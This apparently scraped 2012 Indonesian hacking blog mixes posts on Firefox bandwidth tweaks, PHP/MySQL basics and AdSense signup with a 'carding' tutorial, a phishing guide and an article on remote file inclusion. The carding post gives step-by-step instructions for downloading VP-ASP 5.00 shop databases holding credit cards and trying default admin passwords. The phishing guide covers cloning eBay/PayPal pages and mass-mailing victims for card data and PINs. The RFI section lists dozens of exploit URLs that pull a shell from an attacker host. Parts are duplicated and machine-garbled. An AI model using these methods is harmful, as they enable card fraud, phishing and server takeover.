Kamis, 14 Juni 2012
bandwiht stole through mozilla
There
are many ways to outsmart a slow Internet connection, especially since
you use the internet access in the cafe-cafe that most of them have
limited bandwidth of every computer. Here are some tips and tricks you can try:1). Open the Mozilla Firefox Browser2). In the Address Bar Type: ABOUT: CONFIG3). Find the string below: (make sure all srting under the "TRUE")menggantingnya example:Network.http.pipelining FALSE ==> right click and select "Toggle"Network.http.pipelining TRUENetwork.http.pipelining.maxrequests 64Network.http.proxy.pipelining TRUENETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== this should be False4). create a new srting how: Click the Left 1X Anywhere, Right click NEW >> INTEGER5). Type: 0 Rate nglayout.initialpaint.delay6). Then REFRESH or F57). In the Address Bar Type: ABOUT: BLANKClick the Menu:For OS Windows XP TOOLS >> OPTIONS >> WEB FEATURESFor Linux OS (Vector) EDIT >> PREFERENCESFor different settings across multiple OS EDIT >> ADVANCED9). On Option:ALLOW WEB SITES TO INSTALL SOFTWARE Give Signs Check Box To enable the10). Then press OK Then REFRESH (F5)11). Go To Link It:https://addons.mozilla.org/extensions/mo ...or:https://addons.mozilla.org/extensions/mo ...12). Download SwitchProxy Tool Software Version 1.3.413). After Done Do not Press the Button UPDATE14). Click the sign of X (close) What's In the Upper Right Corner Of POP UP Window Appears15). Close All Browsers Mozilla FireFox,16). Then Open Again To Switch Software Version 1.3.4 SwitchProxy Tool That's the last Install17). If Installation Success, Will Appear Under additional Toolbar Navigation Toolbar & Address Bar.Mozilla Browser Now Ready For UseNote:-
SwitchProxy Tool Software Version 1.3.4 This is in addition to Proxy
Automatically Mozilla FireFox Browser, also Engine Impact of Internet
Connection Speed-
How It's Very Effective When Used On The Solid Online for figuring
Sucking Bandwidth (Majority speed Internet access) Go to Who's Your
Computer Use- Significant Changes That Happened On The Internet connection Broadband / VSAT.
Minggu, 03 Juni 2012
TuTorial Carding VP-ASP Shopping Cart Versi: 5.00
et's get started:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find a VP-ASP 5.00 site?
Type: VP-ASP Shopping Cart
Version: 5.00
How to find a VP-ASP 5.00 site?
VP-ASP 5.00 Finding a site is very simple?
A. Go to google.com and type in: VP-ASP Shopping Cart 5.00
2. You will find many sites with VP-ASP cart software installed 5.00
Now let's go to exploit ..
Page will be like this: **** :/ / ***. victim.com / shop / shopdisplaycategories.asp
Utilize are: diag_dbtest.asp
Now you need to do this: **** :/ / ***. victim.com / shop / diag_dbtest.asp
A page will appear with the people:
xdatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber
Example:
The most important thing here is xdatabase
xdatabase: shopping140
Ok, now the URL will be like this: **** :/ / ***. victim.com/shop/shopping140.mdb
? If you do not download t Database, try this while there dblocation:
xDblocation
resx
url will be: **** :/ / ***. victim.com/shop/resx/shopping140.mdb
If u see an error message that you should try this:
**** :/ / ***. Victim.com/shop/shopping500.mdb
Download mdb file and you should be able to open it with mdb file viewer, you should be able to find one on download.com, or use the MS Office Access.
Inside you should find the credit card information, and you even have to be able to find the admin username and password for the website.
Admin login page is usually located here: **** :/ / ***. victim.com / shop / shopadmin.asp
If you can not find the admin username and password in the passwd file, or you can but it is not true, or you can not find the mdb file at all, then try to find the admin login page and enter the default password is:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
2. Hacking Through Fraud
This method is usually used to hack to get the money. What happens in this method is that you create a clone page.
Target: basically eBay.com or paypal.com to the general credit card, or if u want to target a specific cashable bank as regionbank.com then u have to make a clone of the page for that bank.
What is eBay.com?
Its shopping sites around the world are used by many billions of people who use their credit cards on ebay. What do you do to make a similar page like eBay and upload it at some hosting that don? T has the legal limit, tried to find hosting in Europe they will make you a fraud for a long time, and email eBay user.
How to get emails from their users?
Go to google.com and type in "Email Harvestor" or Spider Email and search for eBay Buyers and Sellers eBay and u will get a long list. That this list is not accurate, but from 1000 1 email a minimum will apply. Atleast you will get some time.
Well u make a clone of the ebay page, and the letter u create a list of the spider with a message like "Your account has been hacked", or any reason that professional look, and ask them to visit the link below and enter your billing information , and our own fraud program when they enter their info comes straight to your email.
On the form page u have a PIN is required for u also get a PIN number through which u can cash via ATM ..
Now if u run a scam or fraud ebay paypal, up to luck who your victim. A client of Bank of America or Citibank, or the area, on his luck, maybe u get a cashable, maybe u are just unlucky, nothing else.
Search on google to download scam site and learn!
After you create your scam site, just find some spiders harvestor email or from the internet (good download on Bulk Email Software Superstore - Email Marketing Internet Advertising) and make a good email list.
And you need to find a mailer (send mass mailers) that sends a mass - email to any email with a message to update their account on fraud ur page). In from, use the email and used eBay@reply3.ebay.com subject: eBay - Update your eBay account and on eBay using the name
Some Tips:
A. Make sure you keep the hosting or a link in the email u will send, and when you visit the victims email, it will display the page can not be displayed, and your plan will fail.
2. The most difficult point is to find the hosting that remain in the scam. even i don t find easily, a very very difficult?.
3. Maybe u have any contact with someone who has a company or a co-location hosting and dedicated it to hide the fraud in some dedicated without restrictions.
4. Looking for a good email list (that means really good = user)
5. Your land mass mailing email software on a user's inbox.
That's all the reader. Hope you will find this tutorial useful. And remember, credit card hacking is illegal, it's just post the information and I am not responsible for the actions taken by you after reading this tutorial.
Waiting Tresno be accustomed pillar jalaran
ben pen ojo violent
a significant
Sabtu, 02 Juni 2012
Penerapan koneksi PHP ke Databash
Telah dijelaskan bahwa koneksi ke database merupakan salah satu
fitur PHP yang paling sering digunakan. Apalagi PHP juga telah
menyediakan fungsi-fungsi built in yang mendukung koneksi database ke
MySQL server. Nah, setelah Anda sedikit banyak tahu tentang MySQL,
kini saatnya untuk menerapkan pengetahuan tersebut untuk membuat
aplikasi web database dengan PHP dan MySQL.
Untuk keperluan contoh dan latihan, kita akan membuat sebuah database dengan MySQL. Buatlah sebuah database dengan nama datakontak sebagai berikut:
Tabel Kotak : Record-record untuk tbl_kontak
nama alamat telpon email tgl_lahir !!
Anton Jl. Angsa 1-123456 anton@anton.com 1975-01-01
Betty Jl. Belimbing 2-234567 betty@betty.net 1980-02-02
Charlie Jl. Cakra 3-345678 charlie@charlie.org 1974-03-03
Diana Jl. Durian 4-456789 diana@diana.tv 1979-04-04
Enggar Jl. Elang 5-567891 enggar@enggar.info 1982-05-05
Fifi Jl. Flamengo 6-678912 fifi@fifi.biz 1977-06-06
Gina Jl. Gelora 7-789123 gina@gina.com 1973-07-07
Kemudian buatlah sebuah file teks yang berisi teks sebagai berikut:
insert into tbl_kontak values ('Anton','Jl. Angsa 1','123456',' anton@anton.com','1975-01-01');
insert into tbl_kontak values ('Betty','Jl. Belimbing 2','234567',' betty@betty.net','1980-02-02');
insert into tbl_kontak values ('Charlie','Jl. Cakra 3','345678',' charlie@charlie.org','1974-03-03');
insert into tbl_kontak values ('Diana','Jl. Durian 4','456789',' diana@diana.tv','1979-04-04');
insert into tbl_kontak values ('Enggar','Jl. Elang 5','567891',' enggar@enggar.info','1982-05-05');
insert into tbl_kontak values ('Fifi','Jl. Flamengo 6','678912',' fifi@fifi.biz','1977-06-06');
insert into tbl_kontak values ('Gina','Jl. Gelora 7','789123',' gina@gina.com','1973-07-07');
Simpanlah file teks tersebut dengan nama misalnya tbl_kontak.sql, lalu jalankan perintah mysql dari prompt/shell sebagai berikut:
Nah, sekarang kita masuk ke aplikasi PHP yang akan mengakses database tersebut. Latihan pertama yang diberikan adalah mengakses atau melakukan koneksi ke server MySQL, mengambil query, dan menampilkan query tersebut ke halaman web.
Untuk melakukan koneksi ke database MySQL digunakan fungsi mysql_connect(). Fungsi ini merupakan jembatan antara aplikasi PHP dengan database MySQL. Sintaksnya adalah sebagai berikut:
Berikut ini adalah contoh skrip bagaimana mengakses tabel tbl_kontak dari database datakontak yang telah kita buat di awal artikel ini.
<title> Database Data Kontak </title>
$host = “localhost”;
$user = “root”;
$passwd = “root”;
$db = “datakontak”;
$sql = “select * from tbl_kontak”;
$conn = mysql_connect($host,$user,$passwd);
mysql_select_db($db);
$qry = mysql_query($sql);
?>
<table border=1><tr><td bgcolor="#f32142"> Nama </td><td bgcolor="#f32142"> Alamat </td><td bgcolor="#f32142"> Telpon </td><td bgcolor="#f32142"> Email </td><td bgcolor="#f32142"> Tanggal Lahir </td></tr>
<tr><td bgcolor="#f7efde"> =$row['nama']?> </td><td bgcolor="#f7efde"> =$row['alamat']?> </td><td bgcolor="#f7efde"> =$row['telpon']?> </td><td bgcolor="#f7efde"> =$row['email']?> </td><td bgcolor="#f7efde"> =$row['tgl_lahir']?> </td></tr>
</table>Simpanlah skrip tersebut dengan nama data-kontak.php.
Jika dijalankan skrip tersebut akan nampak seperti ini.
posted : http://forum.indonesianbacktrack.or.id/showthread.php?tid=1656
Tak Akan Pernah Berhasil Jika Tidak Pernah Mencoba Dan Gagal !!
Foto InI Hampir MenyamaI SQL Maap Yang Di Perintahkan Oleh CMD <cd></cd> SQL Map !!
Untuk keperluan contoh dan latihan, kita akan membuat sebuah database dengan MySQL. Buatlah sebuah database dengan nama datakontak sebagai berikut:
mysql> create database datakontak;Pilihlah database tersebut sebagai database aktif.
mysql> use datakontak;Buatlah sebuah tabel baru dengan nama tbl_kontak sebagai berikut:
mysql> create table tbl_kontak(Tabel ini adalah contoh suatu tabel daftar nama kontak. Isikan tabel tersebut dengan data-data yang terdapat pada tabel di bawah ini:
-> nama varchar(20),
-> alamat varchar(30),
-> telpon varchar(12),
-> email varchar(30),
-> tgl_lahir (date);
Tabel Kotak : Record-record untuk tbl_kontak
nama alamat telpon email tgl_lahir !!
Anton Jl. Angsa 1-123456 anton@anton.com 1975-01-01
Betty Jl. Belimbing 2-234567 betty@betty.net 1980-02-02
Charlie Jl. Cakra 3-345678 charlie@charlie.org 1974-03-03
Diana Jl. Durian 4-456789 diana@diana.tv 1979-04-04
Enggar Jl. Elang 5-567891 enggar@enggar.info 1982-05-05
Fifi Jl. Flamengo 6-678912 fifi@fifi.biz 1977-06-06
Gina Jl. Gelora 7-789123 gina@gina.com 1973-07-07
Kemudian buatlah sebuah file teks yang berisi teks sebagai berikut:
insert into tbl_kontak values ('Anton','Jl. Angsa 1','123456',' anton@anton.com','1975-01-01');
insert into tbl_kontak values ('Betty','Jl. Belimbing 2','234567',' betty@betty.net','1980-02-02');
insert into tbl_kontak values ('Charlie','Jl. Cakra 3','345678',' charlie@charlie.org','1974-03-03');
insert into tbl_kontak values ('Diana','Jl. Durian 4','456789',' diana@diana.tv','1979-04-04');
insert into tbl_kontak values ('Enggar','Jl. Elang 5','567891',' enggar@enggar.info','1982-05-05');
insert into tbl_kontak values ('Fifi','Jl. Flamengo 6','678912',' fifi@fifi.biz','1977-06-06');
insert into tbl_kontak values ('Gina','Jl. Gelora 7','789123',' gina@gina.com','1973-07-07');
Simpanlah file teks tersebut dengan nama misalnya tbl_kontak.sql, lalu jalankan perintah mysql dari prompt/shell sebagai berikut:
# mysql datakontak < tbl_kontak.sqlatau
c:\mysql\bin> mysql datakontak < tbl_kontak.sqlUntuk memeriksa apakah pengisian data tersebut berhasil, maka buatlah query sebagai berikut:
Hasil yang diberikan seharusnya akan sama persis dengan yang terlihat pada Tabel Kontak.
myqsl> use datakontak;
mysql> select * from tbl_kontak;
Nah, sekarang kita masuk ke aplikasi PHP yang akan mengakses database tersebut. Latihan pertama yang diberikan adalah mengakses atau melakukan koneksi ke server MySQL, mengambil query, dan menampilkan query tersebut ke halaman web.
Untuk melakukan koneksi ke database MySQL digunakan fungsi mysql_connect(). Fungsi ini merupakan jembatan antara aplikasi PHP dengan database MySQL. Sintaksnya adalah sebagai berikut:
mysql_connect(host, user, password)Server adalah nama server yang merupakan host dari MySQL server, sedangkan user dan password adalah user dan password MySQL. Contoh:
$conn = mysql_connect('localhost','root','root')Setelah jembatan itu terbentuk, berikutnya adalah memilih database mana yang akan digunakan dalam aplikasi PHP. Fungsi yang digunakan adalah mysql_select_db(). Sintaksnya adalah sebagai berikut:
mysql_select_db(namadatabase[,koneksi])Parameter koneksi adalah variabel yang menyimpan koneksi ke MySQL server yang dilakukan oleh fungsi mysql_connect(). Contoh:
mysql_select_db('datakontak',$conn)Berikutnya adalah mengambil query dari database yang telah terkoneksi tersebut. Fungsi yang digunakan adalah mysql_query(). Sintaksnya adalah sebagai berikut:
mysql_query(perintahsql[,koneksi])Contoh:
$qry = mysql_query('select * from tbl_kontak',$conn)Yang terakhir adalah menampilkan hasil query tersebut ke halaman web. Fungsi yang digunakan adalah mysql_fetch_array(). Fungsi ini digunakan untuk memasukkan hasil query ke dalam array assosiatif dan/atau array numeris. Dalam bentuk variabel array, tentunya record-record tersebut kini bisa ditampilkan. Sintaks dari fungsi mysql_fetch_array() adalah sebagai berikut:
mysql_fetch_array(query)Query adalah hasil query yang didapatkan dari fungsi mysql_query(). Contoh:
$row = mysql_fetch_array($qry)Variabel $row inilah yang merupakan array yang menyimpan hasil query. Dengan demikian untuk menampilkan field-field pada query Anda dapat menggunakan $row[0], $row[1], dan seterusnya, atau $row['namafield1'], $row['namafield2'], dan seterusnya. Yang harus diperhatikan adalah bagaimana caranya kita menampilkan query tersebut sehingga sedap dipandang.
Berikut ini adalah contoh skrip bagaimana mengakses tabel tbl_kontak dari database datakontak yang telah kita buat di awal artikel ini.
<title> Database Data Kontak </title>
$host = “localhost”;
$user = “root”;
$passwd = “root”;
$db = “datakontak”;
$sql = “select * from tbl_kontak”;
$conn = mysql_connect($host,$user,$passwd);
mysql_select_db($db);
$qry = mysql_query($sql);
?>
<table border=1><tr><td bgcolor="#f32142"> Nama </td><td bgcolor="#f32142"> Alamat </td><td bgcolor="#f32142"> Telpon </td><td bgcolor="#f32142"> Email </td><td bgcolor="#f32142"> Tanggal Lahir </td></tr>
<tr><td bgcolor="#f7efde"> =$row['nama']?> </td><td bgcolor="#f7efde"> =$row['alamat']?> </td><td bgcolor="#f7efde"> =$row['telpon']?> </td><td bgcolor="#f7efde"> =$row['email']?> </td><td bgcolor="#f7efde"> =$row['tgl_lahir']?> </td></tr>
</table>Simpanlah skrip tersebut dengan nama data-kontak.php.
Jika dijalankan skrip tersebut akan nampak seperti ini.
posted : http://forum.indonesianbacktrack.or.id/showthread.php?tid=1656
Tak Akan Pernah Berhasil Jika Tidak Pernah Mencoba Dan Gagal !!
Foto InI Hampir MenyamaI SQL Maap Yang Di Perintahkan Oleh CMD <cd></cd> SQL Map !!
PengerTian Google Adsense . dan Cara Register Google Adsense Melaui BlogSpot .
AdSense adalah program kerjasama
periklanan melalui media Internet yang diselenggarakan oleh Google.
Melalui program periklanan AdSense, pemilik situs web atau blog yang
telah mendaftar dan disetujui keanggotaannya diperbolehkan memasang unit
iklan yang bentuk dan materinya telah ditentukan oleh Google di
halaman web mereka. Pemilik situs web atau blog akan mendapatkan
pemasukan berupa pembagian keuntungan dari Google untuk setiap iklan
yang diklik oleh pengunjung situs, yang dikenal sebagai sistem pay per click (ppc) atau bayar per klik.
Selain menyediakan iklan-iklan dengan sistem bayar per klik, Google AdSense juga menyediakan AdSense untuk pencarian (AdSense for Search) dan iklan arahan (Referral).
Pada AdSense untuk pencarian, pemilik situs web dapat memasang kotak
pencarian Google di halaman web mereka. Pemilik situs akan mendapatkan
pemasukan dari Google untuk setiap pencarian yang dilakukan
pengunjung melalui kotak pencarian tersebut, yang berlanjut dengan
klik pada iklan yang disertakan pada hasil pencarian. Pada iklan
arahan, pemilik situs akan menerima pemasukan setelah klik pada iklan
berlanjut dengan tindakan tertentu oleh pengunjung yang telah
disepakati antara Google dengan pemasang iklan tersebut.
Istilah-Istilah dalam AdSense
Publisher
Publisher adalah orang atau pemilik situs yang sudah bergabung dan memasang iklan AdSense di situs mereka.
Ad Units
Yang dimaksud dengan Ad Units
adalah iklan AdSense itu sendiri. Ad Units terdiri dari beberapa jenis
dan beberapa ukuran. Yang paling umum adalah jenis iklan teks. Pada
saat pengunjung mengklik unit iklan ini, maka (jika sah) pemasang iklan
akan mendapatkan pemasukan sesuai dengan nilai CPC-nya.
Link Units
Link Units hampir sama dengan Ad
Units, hanya saja formatnya mirip dengan format menu yang biasa kita
temui di situs-situs web. Yang membedakan Link Units dengan Ad Units
adalah pada saat pengunjung meng-klik iklan ini, maka ia akan diarahkan
pada halaman hasil pencarian di search engine Google. Publisher baru
akan mendapatkan pemasukan apabila pengunjung mengklik salah satu Ad
Unit yang ada di halaman tersebut. Pada prakteknya, Link Units terbukti
menghasilkan pemasukan lebih banyak dibandingkan Ad Units biasa.
AdSense for Content
AdSense for Content adalah iklan
AdSense yang dipasang di dalam suatu halaman. Iklan-iklan yang muncul
adalah iklan-iklan yang berhubungan dengan isi halaman tersebut. Atau
istilahnya menggunakan konsep kontekstual. Ad Units dan Link Units
adalah yang termasuk dalam AdSense for Content ini.
Alternate Ads
Pada
AdSense for Content, iklan tidak selalu muncul. Sebabnya antara lain
bisa karena memang stok iklan yang berhubungan dengan isi situs sudah
habis atau Google tidak dapat memperkirakan apa isi situs itu
sebenarnya. Jika ini terjadi, secara default, yang ditampilkan adalah
iklan layanan masyarakat atau sering dikenal dengan istilah PSA (Public Service Ads).
Karena bertipe donasi, maka jika diklik, iklan ini tidak menghasilkan
apa-apa bagi publisher. Untuk mengatasinya, Google memperbolehkan kita
untuk memasang Alternate Ads atau iklan alternatif. Jika Ad Units
yang dibuat telah diatur dengan menggunakan Alternate Ads, maka
apabila Ad Units tersebut tidak dapat tampil, yang muncul adalah iklan
alternatif yang telah diatur sebelumnya.
Channels
Channels adalah semacam label yang
dapat diberikan pada Ad Units, Link Units, AdSense for Search, dan
Referrals. Satu unit iklan dapat memiliki lebih dari satu label, dan
sebaliknya, satu label dapat digunakan untuk lebih dari satu unit
iklan. Di halaman laporan Google AdSense, hasil laporan akan
dikelompokkan berdasarkan Channels, sehingga penggunaan Channels akan
sangat memudahkan publisher untuk menganalisa performa AdSense mereka.
Umumnya, publisher akan memberikan nama Channels yang sama pada
unit-unit iklan yang ada di satu situs. Jika ingin lebih detail,
sah-sah saja untuk memberikan nama Channels yang berbeda pada setiap
unit iklan di masing-masing situs. Yang perlu diingat, maksimal jumlah
Channels yang diperbolehkan saat ini adalah 200 kanal.
Page Impressions
Page Impressions adalah jumlah yang
menunjukkan berapa kali halaman yang mengandung Ad Units dibuka oleh
pengunjung. Nilainya tidak terpengaruh oleh kuantitas Ad Units yang
ada di dalam halaman yang bersangkutan.
Clicks
Clicks adalah jumlah klik pada Ad
Units milik publisher. Dalam halaman laporan AdSense, publisher dapat
melihat total klik yang ia dapatkan, maupun berdasarkan Ad Units atau
Channelnya.
CTR (Clickthrough Rate)
CTR adalah perbandingan dalam
persen antara jumlah klik yang diterima suatu Ad Units dengan jumlah
tampilan Ad Units tersebut. Misalnya, satu Ad Units yang ditampilkan 40
kali dan diklik 10 kali memiliki nilai CTR 25% (10:40).
CPC (Cost Per Click)
CPC adalah jumlah uang yang akan
didapatkan oleh publisher apabila Ad Units tertentu diklik. Nilai CPC
masing-masing Ad Units berbeda dan ditentukan oleh banyak faktor,
termasuk performa dan kualitas situs milik publisher. Namun secara
umum, nilai maksimal yang mungkin adalah 20% dari nilai tawaran dinamis
yang ditawarkan oleh pemasang iklan.
eCPM (Effective CPM)
eCPM atau CPM (Cost Per Million)
adalah hasil pembagian antara jumlah pendapatan publisher dengan jumlah
impresi halaman (per 1.000) yang ia dapatkan dari iklan-iklannya.
Sebagai contoh, publisher yang menghasilkan USD 200 dari 50.000
impressi akan memiliki nilai CPM sebesar USD 4 (USD 200 dibagi 50).
Kebijakan program AdSense
Meski program AdSense memberikan
keuntungan yang besar, Google menetapkan aturan ketat untuk melindungi
kepentingan semua pihak yang terlibat, termasuk pemasang iklan yang
sering dirugikan oleh tindakan tidak terpuji pemilik situs anggota
program AdSense. Beberapa larangan Google yang harus ditaati pemilik
situs web atau blog peserta program AdSense adalah:
- Mengklik iklan yang ditampilkan situs milik sendiri, baik dengan cara manual atau dengan bantuan perangkat lunak khusus
- Dengan sengaja mendorong pengunjung situs untuk mengklik iklan yang ditampilkan, misalnya dengan kata-kata “klik iklan ini” atau “kunjungi halaman ini”
- Mengubah bentuk dan ukuran unit iklan yang telah ditentukan Google
- Membuat pranala langsung menuju halaman hasil pencarian AdSense untuk pencarian
- Mengisi secara otomatis kotak pencarian AdSense dengan kata kunci (keyword) tertentu
- Memanipulasi target iklan dengan katakunci tersembunyi atau dengan IFRAME
- Kode unit iklan AdSense harus ditempatkan langsung pada kode html Situs web tanpa perubahan. Pemilik situs tidak diperbolehkan mengubah kode AdSense dengan alasan apapun, misalnya dengan tujuan menampilkan hasil klik di jendela pop up atau mengalihkan target iklan.
Optimisasi Penghasilan AdSense
Potensi keuntungan mengikuti program AdSense
membuat banyak pemilik situs web mengembangkan berbagai metode untuk
meningkatkan jumlah klik pada iklan yang mereka tayangkan. Sebagian
metode terbukti ilegal dan melawan kebijakan resmi program AdSense.
Metode yang lain diperbolehkan, bahkan didorong penggunaannya oleh
Google. Beberapa metode yang dianggap sah adalah:- Memodifikasi warna unit iklan menggunakan palet warna yang disediakan AdSense
- Meletakkan unit iklan pada posisi tertentu pada halaman web yang dianggap memiliki tingkat keterbacaan tinggi
- Menghilangkan garis tepi unit iklan dan menyamakan warna latarnya
dengan warna latar halaman web sehingga unit iklan terlihat membaur
dengan isi halaman
Cara Paling Jitu Dan Manjur , Register Google Adsense Dengan Menggunakan Blogspot
Langsung Saja- Buat Email BAru Gmail
- Buat Blog Dengan Blogspot
- Posting Article Sekitar 11 [ Usahakan , Tanggal , Hari Dan Jam'nya Berbeda ] Dan Usahakan postingan Pertama Rubah Tahun Terbitnya Sekitar tahun 2011
- Gunakan Template Standar Blogspot ( jangan Ada Readmore ) Biarkan Saja Default
- buat 4 Navigasi [ Home . Contack . Privacy Policy . Sitemap ]
- Usahakan Yang 11 postingan Lebih Dari 800 Kata Dan Ada Gambar
- Seting 5 Article Di Home PAge .
- Sumbsit Url Blog Ke Goolge dan Webmaster usahakan Dapat Status Verifikasi dari Goolge
- Setelah Umur Blog Anda 1 minggu Registrasi Ke Google Adsense Lewat BlogSpot .
- finish Dan Nikmati Uang $999.99/Day .
Remote File Inclusion
Mungkin bagi sebagian teman-teman
bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian
teman-teman yang biasa bergelut dengan komputer security pasti telah
sering mendengar apa yang disebut dengan Remote File Inclusion atau
biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk
serangan secara remote yang memanfaatkan kelemahan script pada suatu
halaman website karena tidak tersanitasi dengan baik, dengan cara
menyisipkan script lain untuk exploitasi,
Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:
…
include($my_ms[”root”].’/error.php’);
…
Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.
Referensi:
http://www.milw0rm.com
Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:
…
